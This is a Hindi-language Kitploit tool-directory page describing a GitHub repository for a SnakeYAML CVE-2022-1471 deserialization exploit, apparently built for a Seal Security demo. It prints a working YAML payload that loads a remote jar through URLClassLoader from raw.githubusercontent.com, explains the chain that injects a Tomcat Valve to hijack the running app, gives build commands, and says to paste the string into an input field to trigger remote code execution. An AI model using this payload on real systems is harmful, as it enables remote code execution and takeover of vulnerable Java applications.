Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
yaml-payload-2 — SnakeYAML CVE-2022-1471 शोषण पेलोड Seal Security डेमो के लिए | Kitploit
उपकरण/GitHubGitHub/seal-sec-demo-2/yaml-payload-2
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणरेड टीमिंगपेलोड डेवलपमेंट
GitHubseal-sec-demo-2/yaml-payload-2

yaml-payload-2

SnakeYAML CVE-2022-1471 शोषण पेलोड Seal Security डेमो के लिए

रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

yaml-payload

CVE-2022-1471 के लिए एक SnakeYAML डिसीरियलाइज़ेशन एक्सप्लॉइट पेलोड, artsploit/yaml-payload से अनुकूलित (मूल रूप से mbechler/marshalsec पर आधारित)।

यह क्या करता है

जब SnakeYAML के असुरक्षित Yaml.load() के माध्यम से लोड किया जाता है, यह पेलोड चल रहे एप्लिकेशन पर कब्ज़ा कर लेता है और उसे "You've Been PWNED" पेज से बदल देता है:

  1. Tomcat Valve इंजेक्ट करता है — रिफ्लेक्शन के माध्यम से चल रहे Spring Boot ऐप में, मौजूदा पोर्ट 8080 को हाईजैक करते हुए — वही URL (किसी भी ngrok टनल सहित) अब PWNED पेज परोसता है
  2. ब्राउज़र को ऑटो-रीडायरेक्ट करता है — POST प्रतिक्रिया 302 रीडायरेक्ट भेजती है, इसलिए ब्राउज़र मैन्युअल रिफ्रेश के बिना तुरंत PWNED पेज लोड करता है
  3. ब्राउज़र को स्वचालित रूप से सही URL पर खोलता है (ngrok सार्वजनिक URL यदि उपलब्ध हो, अन्यथा localhost:8080)
  4. एक्सप्लॉइट साक्ष्य को कंसोल/CI लॉग में प्रिंट करता है

यदि Tomcat Valve इंजेक्शन उपलब्ध नहीं है (जैसे गैर-Spring ऐप), यह पोर्ट 9999 पर एक स्टैंडअलोन HTTP सर्वर शुरू करने और ngrok चल रहा होने पर स्वचालित रूप से ngrok टनल बनाने का फॉलबैक करता है।

यह स्थानीय रूप से macOS पर और CI/CD पाइपलाइनों (जैसे Ubuntu पर GitHub Actions) दोनों में काम करता है।

एक्सप्लॉइट श्रृंखला कैसे काम करती है

SnakeYAML पेलोड Java SPI (सर्विस प्रोवाइडर इंटरफ़ेस) के माध्यम से को ट्रिगर करता है:

ScriptEngineManager
root@kitploit:~
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["https://raw.githubusercontent.com/seal-sean-org/yaml-payload/main/yaml-payload.jar"]]]]
  1. SnakeYAML इस रिपो के yaml-payload.jar की ओर इशारा करते हुए java.net.URL इंस्टैंशिएट करता है
  2. इसे रिमोट क्लासेस लोड करने के लिए URLClassLoader में लपेटता है
  3. ScriptEngineManager META-INF/services/javax.script.ScriptEngineFactory के माध्यम से AwesomeScriptEngineFactory को खोजता और लोड करता है
  4. फैक्ट्री का कंस्ट्रक्टर चल रहे Tomcat पाइपलाइन में एक Valve इंजेक्ट करता है, / पर हर बाद की प्रतिक्रिया को PWNED पेज से बदल देता है

बिल्ड

JDK 17+ की आवश्यकता है:

root@kitploit:~
javac -d build src/artsploit/AwesomeScriptEngineFactory.java
cp -r src/META-INF build/
cd build && jar -cfv ../yaml-payload.jar . && cd ..

उपयोग

maven-demo प्रोजेक्ट में एक्सप्लॉइट पेलोड के रूप में उपयोग किया जाता है। RCE ट्रिगर करने के लिए पेलोड स्ट्रिंग को ऐप के नाम फ़ील्ड में पेस्ट करें। अगले अनुरोध पर ऐप का पेज PWNED पेज से बदल दिया जाएगा। पूर्ण डेमो निर्देशों के लिए उस रेपो का README देखें।

टूल डाउनलोड करें